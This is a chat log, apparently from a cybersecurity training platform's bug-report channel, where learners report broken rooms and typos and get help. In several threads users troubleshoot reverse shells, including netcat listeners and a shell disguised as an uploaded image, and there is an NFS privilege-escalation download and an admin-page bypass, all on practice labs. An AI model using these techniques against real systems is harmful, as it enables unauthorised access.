@raven ice you can try relaunching your browser and relogging in tryhackme for a good measure
ok thx!!
Hi, I've just finished the room brainstorm, and I wasn't able to get the 1st question (About the number of ports) correct.
I've run multiple nmap and they always give the same number of ports, and it's twice less than what the expected answer is.
I've been looking at some writeups, and in the nmap output (like from TCM) it only shows the same few ports (ie. less than what the expected answer is)
I've seen messages of other people being also confused about this.
Hey!! Probably it is not really a bug, but rather the effect of changes in general, but in Shodan room, first question in task 3 does not accept correct answer. https://tryhackme.com/room/shodan
Learn about Shodan.io and how to use it for devices enumeration - is your coffee machine publicly accessible?
hi, not sure if this is a bug. I'm in the network services 2 room doing task 4 exploiting NFS. After I ssh into the machine and ran the bash file, I got the root access. But the root flag file isn't there
sorry nvm i figured it out
Hi ((: did the steps that @harsh oyster recommended work by any chance? This looks like something you'll have to email support@tryhackme.com about. Could you include this screenshot (#room-bugs message) & your THM username please? Thankss!
Wanted to raise this concern...it seems to be some issue with this room
@green steppe shodan go brokey
is there an issue with RootMe room? I am connected with openvpn and the IP of the box it gives me doesn't seem to be working.
trying through the attackbox now to see if there is an issue.
Hey guys, I found out it's possible to bypass the challenge for OWASP top 10 - task 25 - #2 (Admin cookie)
You get logged into the page as admin if you go to /admin without a cookie
I am unable to open vulnversity and blue room in offensive pen test path, everything else opens just fine
I tried different browsers, PCs etc.
That's a site bug
The osquery room is so broken. Is this a known thing?
99% of the time, the room isn't broken and it's user error
If you're trying to report a bug, please provide details
I'm just making sure it's not a known problem. I've been working on this thing since yesterday and almost nothing works as it says in the description. I'll grab some examples.
Task 9
From this point forward, osqueryi becomes unusable and has to be killed. Half the tables I try to query cause this.
After a few of those, the entire machine becomes unusable (100% CPU). I have restarted mine at least 10 times already.
and here we go again:
Mhm I can't remember if that room came out before the base image changes
I'll benchmark out of curiosity, might just need switching to a t3.small cc @obsidian kiln @hardy tendon
One more thing that happened yesterday: when I opened the web interface for Kolide and clicked on "add new host", there was no "Osquery Enroll Secret". Since I didn't know it was supposed to be there, I've spent an hour trying to find it somewhere else.
Finally I decided to restart the machine, and this time it was there.
Thank you
Gave +1 Rep to @dusky junco
https://tryhackme.com/room/blue isnt loading?
Good day,
I just finished (All In One) room and found it's not vulnerable to Arbitrary File Upload as mentioned in the official write-up by the room creator
I tried it with Metasploit and tried it manually
Vulnerable version is 3.1.3 and the version in the room is 3.1.7 (up-to-date)
why does one of the rooms named "Blue" keep loading?
It is a site bug.
is it going to get fixed?
Probably.
okay thanks
Gave +1 Rep to @eternal summit
in Advent of Cyber 1, supporting materials for Task 24, the explanation of the && control operator is either incorrect or the author is trying to say something else. It reads: "The && operator is used with more than one command e.g. ls && pwd. The second command only executes if the first command and the second command is successful. You can pass an input containing && other-command and the backend would successfully execute it if both commands ran successfully."
"The second command only executes if the first command and the second command is successful." - maybe they are trying to say something I'm not expecting ? But I read it as "if the second command is not successful, it does not execute", as if we were talking about a transaction. The same again at the end of the paragraph
If we are trying to explain that the exit status will only be 0 if both commands are successful, that would be correct indeed. But I don't think it is what is intended, in the context of the xmas task
what they are talking about is called short-circuit evaluation, but it's worded incorrectly
with &&, if the first statement is false, the second statement is never executed, because there's no way the conjunction can be true. Similarly, with ||, if the first statement is true, the second statement does not need to be executed, because the overall statement will still be true.
Hello,
This room is private, it's normal ?
https://tryhackme.com/room/zthlinux
many of the linux walkthrough rooms have been updated and the older ones made private
Hi Folks, just a question...
you should probably say your question
Hey everyone,
In the room "how websites work" there is a sort of popup that gives tips, with two button "back" and "next". The first tip is getting hidden due to its position. The content is unreadable there
I might be wrong, but I think task 7 of the rpmetasploit room needs updating - On metasploit v6.0.48-dev, searching for "server/socks5" returns no results, but searching for "socks" returns "auxiliary/server/socks_proxy" as well as "socks_unc" and "sockso_traversal". Can anyone confirm or is this a bug on my end?
the msf modules have been renamed since that room was released
I see, thanks!
Hi there, that might be down to your resolution on your webbrowser. I had a similar issue before and resolved it using the zoom function
I'll give it a try. Thanks
Gave +1 Rep to @hollow vector
That's a site bug
Wait for it to be fixed.
is it me or the image is not loading?
https://tryhackme.com/room/xss
tried refreshing a lot, used different browsers
yessir
Anyone done Corp recently? It says the Admin accounts expired
Yeah, you need to reset the password
mmm tried that but it just fails, Ill try again
wow, worked that time.... the qwerty was not strong with me tonight. thanks
Osquery room is broken yet again,
the CMD command for starting the endpoint monitor in step 6
launcher.exe --hostname=127.0.0.1:8080 --enroll_secret=k3hFh30bUrU7nAC3DmsCCyb1mT8HoDkt --insecure
does not work, seems to be a path issue.
launcher.exe --hostname=127.0.0.1:8080 --enroll_secret=k3hFh30bUrU7nAC3DmsCCyb1mT8HoDkt --insecure --osqueryd_path="C:\Users\Administrator\Desktop\launcher\windows\osqueryd.exe"
works, but still crashes and doesn't connect back to fleet
Fix
Okay, so osquery Task9 - Q6, I checked the date in windows defender, made sure the format is good but still no good, literally tried adding in all the possible second combinations. Should I look for a solution in osquery?
2021-03-31 17:51:09 or 2021-03-31 17:50:44
the only 2 dates that are in the event logs, none work, this box is crying for help, at least give it 2 cpu's.
I went through that problem. I found the accepted date using the XML view in Event Viewer. It's a few hours away from one of those two, so I'm thinking it's a time zone issue?
I've had all sorts of problems with this room. Definitely the worst one I've done so far.
issue with task 4 exploiting nfs - https://tryhackme.com/room/networkservices2 .
this is my output when I run bash
Not a bug. You downloaded it incorrectly.
oh
if you want to use wget then: wget https://github.com/polo-sec/writing/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash?raw=true
You might wanna rename it afterwards
@soft terrace thanks, I was missing the ?raw=true portion
Gave +1 Rep to @soft terrace
If you want to download something with wget from github click on raw first
Fixed thanks ((:
Gave +1 Rep to @thorn forge
In splunk room, https://tryhackme.com/room/bpsplunk
Task 2 last question, the answer it accepts is ||answers.splunk.com||
But splunk has changed the url to|| community.splunk.com||
In the owasptop10, task 20 and the last question on XSS, the answer was actually placed in the hint section, please rectify it. It should be hint not pure/plain answer
throwback: Fetching certificate, never gets downloaded or offered to me
can you open up the dev console and see if there's any errors? @sharp wave
Hello,
I think the "Enterprize" box is experiencing an error in the CMS used and exploitable, after a few seconds of navigation shows on all pages the error "Oops, an error occurred!".
PS: In order not to make spoiler, I don't want to give exact details.
@real rover #room-help
Room: https://tryhackme.com/room/torforbeginners
Task: 3
The link to the tor browser installation guide for kali is broken.
https://hackingpress.com seems to be down for some SSL certificate issues.
owasp juice shop room task 4- im logging in with the admin user and pass but not getting the flag
nvm it just wasnt updating for some reason
Heyo! I am doing OWASP room, task 26, [Severity 8] Insecure Deserialization - Code Execution, and something is wrong with the webapp, I am getting 500 on feedback subpage :/ I am using AttackMachine.
I could make an account, see cookies, got to admin panel, all kinds of stuff, but then this.
probably not a room bug. Just means the service is encountering an error, which could be related to something you just did. It's been a while since I did that room, so I don't recall that task very well
Ok, I will try to kill machine and spawn another one then, and we will see if it still happens. I did not really 'mess' with anything, just watched cookies and went to admin panel by changing directory, no hacking anything really.
hm
perhaps it requires that you're auth'd first, and that's why it is returning an error? Again, just guessing here, as I don't have that room in front of me
I do not know. I killed machine, deployed a new one, only made an account at this web, and 500 again
well, I will do other tasks for now.
let's jump over to #room-help
ok
in the attacktivedirectory room, in task2, the instructions for installing impacket are wrong, as sudo cd isn't a command, it's just cd, sorry if this doesn't classify in this channel
@viral cobalt
smh, y'all think I know how sudo works? I run everything as root!
I mean, just sudo su at the start
it's fixed, nematode!
sudo judo
trying to start the upload vulnerabilities room
i copied the command they give me in my terminal but doesnt seem to be working
open your /etc/hosts file and make sure it's been updated correctly. And use the site names, not the IPs, in your browser (with http://).
ok my hosts file is good i think
it says to do the what the shell room first anyways so i might do that
You have multiple entries for the same hosts, you want to delete them so that there is only one
O
you've run that command multiple times
but now your computer doesn't know which IP it should point to
could i just delete the file and redo the command?
So, not a room bug :). Let's hop over to #room-help
okey
Hey everyone, I am having an issue with the non-metasploit portion of the Steel Mountain room. When I use the recommended exploit for the rejetto HTTP file server (https://www.exploit-db.com/exploits/39161) to upload netcat and execute it to get a reverse shell, it seems like netcat on the target machine never executes because I never get a connection back on my machine.
I can see successful GET requests on the python web server for nc.exe on my machine, so its definitely uploading netcat to the target machine.
I've tried restarting my machine, restarting the attack machine, and have ensured that I'm using the correct IPs and ports.
Anyone have any ideas if this is a bug or if I'm doing something wrong? I checked some writeups and they did it the same way as me with no issues, so I'm not sure..
https://imgur.com/a/Cncb1HF some screenshots to see what I am doing.
Hi, Recently i have joined this course and want to join room 'HackPark' but its not loading tried every browser cleared cache everything but not loading.. please resolve this issue ASAP....
Where is flag4 ? Linux challenges
Hi! I don't know if anyone has the same issue but I am unable to enter Learn Rust room
Already tried a lot and it's always stuck loading
I have been trying for the past 5 days and it's always the same
@hot flame same happened with me in hackpark room
Again, site bug.
In the owasptop10 room one of the questions being asked is who developed the tomcat application. However it's not accepting the answer, even after I added "The" before it
Not a bug, your answer is probably just wrong.
Ok
Hello, don't know if this is the right section. I'm trying to play with the For Business Reason by MsMouse but the wordpress site is extremely slow and basically can't do anything in it. Anyone recently had the same experience or is it just me? Thank you.
year of jellyfish shell not coming
I try everything
I try attackbox my mainos bot
shell not coming
Unlikely to be a bug with the room, much more likely to be user error. Have you checked the writeups?
yes I check
I upload my shell
but shell not coming
I can send my payload
It sounds like you should be in #room-help first, until you're actually certain that the room is not working correctly.
The room won't have changed.
That's not a room bug -- it's you either not understanding what's going on, or not enumerating properly
Room has not changed, and it's specifically designed to be very difficult to get a shell back from
I have room bug to report on Upload Vulns final task.
cc @obsidian kiln this hasn't changed, has it?
im getting the 'module not found' error. You said in #room-help that its a magic number issue but theres no magic number in the file i uploaded.
file uploaded minus the ip
command typed following enum of the proper name
the error
it appears to hang like its going to connect to my nc listener and then it spits that error at me every time. Ive been trying it for 2 days with no change in error
@obsidian kiln this is the middle of day 3 so im a bit frustrated. lol
@wraith ice you appear to be missing an IP address in that payload
as i said in the caption, i removed the ip for that screenshot. idk if i can share the thm openvpn ip
but i can show it to you with the ip as it was uploaded.
@obsidian kiln
What's the box IP address?
10.10.105.60
Let's take a look
awesome, thanks mane.
Do you have netcat started?
I'd love for it to be something I'm missing but I'm 99% sure I've tried everything at this point. I've followed guides, done my own troubleshooting, and came here as an absolute last resort.
yes nc -lvnp 4444
i have 2 running
so i have a 4444 and 443 running neither of them are currently connected
Anything come through on the 443 one now?
negative
Okay, so there's something in the way at the network layer there
What OS are you using?
Kali shouldn't have a firewall in the way. Hm
Start a webserver for me?
Just a python3 -m http.server
VPN running directly in the VM?
Yeah, that's a good shout. VPN is connected from the VM, right?
yes
Any other VPNs on the host?
I've seen having an external VPN active on the host mess with this challenge in particular for some reason
oh yes!
i just closed it out but i did have one running on host
ok webserver is started
What port?
8000
Okay, so definitely connects back
yeah i just saw you connect
Try starting a netcat listener on port 8000?
retrying local 0.0.0.0:8000 : Address already in use
Stop the webserver first
I suspect backgrounded servers still hold on to their port
That connect back?
yes
So I wonder why 443 wasn't working. Odd
Give me a sec -- I'll update one of your shells in the container to try port 8000
well i also have the one on 4444
Right, start a netcat listener on port 8000 and try MMK.jpg?
Oh, Node does not like that shell
This is why it's failing
You sure you didn't mess with that magic number? I can't check it in this container
it depends which file youre messing with. like i said ive tried with and without. the one that im certain contains no magic number is CVG.jpg
CVG.jpg -- will try that one
that one is pointing back to 4444 and is the one i screenshotted for you earlier
Yep. Try a listener on port 8000 for me?
This one has had its magic number edited as well
I'll try a completely blank version
Oh, that's not the magic number error
That's because you missed the bracket at the start of the shell
thats the one i sent you earlier. it was directly copied from the linked guide. pasted in to gedit ip and port added and saved as shell.jpg
I'm going to have to kill it in a second given I activated it manually and can't keep the terminal open forever -- you can activate it again with ../content/test.jpg though
yeah i gotchu. thanks for your help man. i really appreciate it
No problem
works like a charm. quick question. Do all js functions start with an opening bracket before function? or is it just this shell.
because i did do a search for a .js shebang to look it over. clearly i missed that but im just asking for future knowledge
only if they're self invoked, so no not always
@sonic willow so if the script called for it to be a self contained thing you would but if the use case didnt require it you wouldnt, right?
yeah exactly, see this post on why you would need one :)
https://stackoverflow.com/questions/592396/what-is-the-purpose-of-a-self-executing-function-in-javascript
Nah, it's just telling it to execute as soon as the script is called -- self-invoked, as Jake called it
I have tried the OpenVAS room in THM and am a little bit confused because the report that I get is different from the actual answer in that room. link of OpenVAS room https://tryhackme.com/room/openvas #PS in the OpenVAS room the installation procedure may be outdated and didn't work with the new version of OpenVAS especially in default credentials.
XSS is working in OWASP-Juice-Shop but the flag isn't displaying. I've followed the troubleshooting included in the first part of the room with no luck.
https://tryhackme.com/room/windowsfundamentals1xbx - task 10
Hence, Task 8 ended with a detailed blog post explaining the Task Manager in great detail. - task 9 covers the task manager
should be: Hence, Task 9 ended with a detailed blog post explaining the Task Manager in great detail.
in room corp you can't click on search and windows buttons therefore you can't open a prompt
Do you need one? This sounds like a bug with your RDP client NGL.
Thought I'd subscribe, try out the service and start from the very beginning. Not a bug as such, just a typo - https://tryhackme.com/room/beginnerpathintro. When doing the Network Security task it states "The air conditioning units where not directly owned by Target"; it should be "were", not "where". Not too sure if you want feedback on anything like this or if this was the correct channel but thought I'd mention it.
Yep, feedback for this is appreciated. Thanks @smoky dew
Gave +1 Rep to @smoky dew
Ah, Damn. Can't fix that bit.
@glad badger, enjoy.
https://tryhackme.com/room/beginnerpathintro
First site:
Second website: were not where
There is a small typo in the JavaScript room, after the break it's a normal colon and not a semicolon. It leads to an Unexpected token error when running the code
Task 3 - Conditionals
I think I have those on my list, those are all related to the Static Site lab pages?
Aye
This isn't really a bug, but a suggestion to turn updates off on gdb pwngdb on the cod caper room, when you first run it, the tool tries to update and hangs for some time.
I am trying to upgrade the shell to meterpreter, but keep running into a Post Failed error and haven't been able to find a solution.
is the theseus room page broken? last thing I have on the page is "answer questions below" but no fields to input answers or anything.
no errors in web console. tested with chrome in win10 and kali linux
Leave and rejoin the room
I can make a change
No problemo
in the room Corp there is a problem. connecting to internet, Invoke-WebRequest doesn't function
CategoryInfo: Not Specified: (:) [], MethodInvocationExeption
FullyQualifiedErrorId: WebExeption
youre attempting to use the command directly from the room
the command downloads from a URL, targets on the THM range dont have access to the internet
you will have to host the tool from your localhost
thanks. Pretty annoying that I had to drop out of the room though as I lose all the progress
Gave +1 Rep to @hazy tiger
You don't lose progress when you leave and re-join a room...?
I'm slightly confused
makes sense
well the servers gets reset so all rev shells etc will get killed
You could have noted the flags down and inputted them after completion :)
yeah well
both sites updated (takes about 5-10mins to update through CDN, etc) thanks cc @smoky dew
Gave +1 Rep to @obsidian kiln
There seems to be an issue with the text in this room. the text isn't complete am confused what am supposed to can someone please look into this. Thanks
Need Help For Sakura Room by OSINT Dojo
Is the Onion site up?
I mean the Deep Paste
I don't think it's up anymore.
Actually I solved that room in april.
But today I was making a video walk-through
Then I discovered that the onion site is not working any more
Any THM Staff available to verify this problem?
Can you DM me the site that you're expecting to visit? As well as the task & question number that you're on
It looks like our attacker got in via Remote File Inclusion (RFI). It's best to look around the system itself now for any evidence of persistence mechanisms that could lead to a payload. There are multiple ways to maintain persistence in most Linux distributions including but not limited to:
Room: https://tryhackme.com/room/bpsplunk
Task: 2, Question: 31
I think the accepted answer should be changed to "community.splunk.com" as "answers.splunk.com" redirects to the above.
Thanks, updated ((:
Gave +1 Rep to @tiny ginkgo
Good find
Linux Fundamentals Part 1 says the machine supposed to start in my browser but that doesn't happen
Do you have this button at the top of the page @soft ice?
Room: https://tryhackme.com/room/retro, after doing an nmap scan it wont show an open port 80 so the gobuster enumeration also wont work, checked the writeup and i think it should be open
How long has the machine been started for?
about 15 min
That should be enough time to start
Give it another five, just to be safe, then try redeploying
Typo in the new Windows Fundamentals 2, task 1:
In Windows Fundamental 1
Should be plural
Fixed. Thank you for reporting.
Gave +1 Rep to @zealous vortex
is the haskHell room having problems? I no matter what haskell script I upload, it just throws internal server error.
for the fun of it I tried uploading a script from one of the writeups (and even the rev-shell from the author of the room - same problem
did try to restart the server a few times
Hi all, I am working on XSS exploitation on the XSS Playground Room. I am on Task 5 DOM Based XSS, I was able to get the onmouseover to work and display my cookie on an alert pop-up... but I see no flag to enter for the answer... I am unsure what to do
I am having an issue with the bounty hunter box. I can't seem to download the files from the ftp server. I tried wget to download the files but it wasn't successful, the connection was successful but ended up hanging after
I'm doing the upload vulnerabilities room on my VM and I'm getting an error when trying to load overwrite.uploadvulns.thm or the ip of the room
I'm getting server not found
@green heart #room-help
Not a bug, you've missed a step
You're not meant to access it by IP either
I see, thank you
I might be wrong, but shouldn't it be 'What is the path..'
Little typo in Task 2 of "What is Networking", which has just been released by cmnatic: it's Tim Berners-Lee, not Bernes
Resolved, thank you (:
Gave +1 Rep to @night yew
You're welcome, thanks to you too CM
Gave +1 Rep to @dusky junco
Hello
On the new release room
at the ending
the href to Extending Your Network room
is including room too
Updated, ty
Gave +1 Rep to @steady shuttle
You're welcome
red pill also works and then the format is correct :)
Hello, I found a bug on the room Smag Grotto, which will reveal the root flag to the user without gaining root.
Should I DM someone, or how should I report the bug?
thx
@sonic willow if you're interested
o that's a throwback
thank you:)
Gave +1 Rep to @eternal summit
hey sure, i made the room, drop me a dm
Thanks
Gave +1 Rep to @eternal summit
I think there is a bug in the Packets & Frames room. I am putting in the correct s,sa,a form for the three way handshake and it is not taking the answer.
it should work with no spaces
Spaces.... Thank you!
I'm getting an "internal server error" on the OWASP Top 10 room, Task 26.
I try to click on the "feedback" link, get that error, and the "encodedpayload" cookie never shows up.
I've also tried to search for it with "{ip}/feedback"
I'm no English major, but I think this is meant to be caused? Room: DNS Manipulation, task 8
I'm having trouble connecting to the attackbox at burp suite room
The deployed attack box is laggy and sometimes the mouse moves on its own
I didn't click anything yet the mouse cursor closed a window
I tried switching device, and it's still laggy
The other rooms aren't as laggy as this one
Nvm the other rooms are just as laggy
add the cert to your browser
this room has a lot of issues
idk if it's normal but I get the error: Microsoft Windows [Version 10.0.17763.1637] on the Wreath room task 40 when I try to get the reverse shell
I received 1 badge 6 times (cat Linux.txt). Is this a bug or ....?
Re: room Brainstorm, does anyone know why port 3389 is open?
On the room Kenobi (Task 3 Gain initial access with ProFtpd) second question the number of exploits changed from 3 to 4
https://tryhackme.com/room/iso27001 Should say "Requirements"
^+ Not to sound rude, not sure on the best way to phrase it but this box could do with a few spelling/grammar checks.
Hey! That's not a problem, if I just bug @dusky junco to come take a look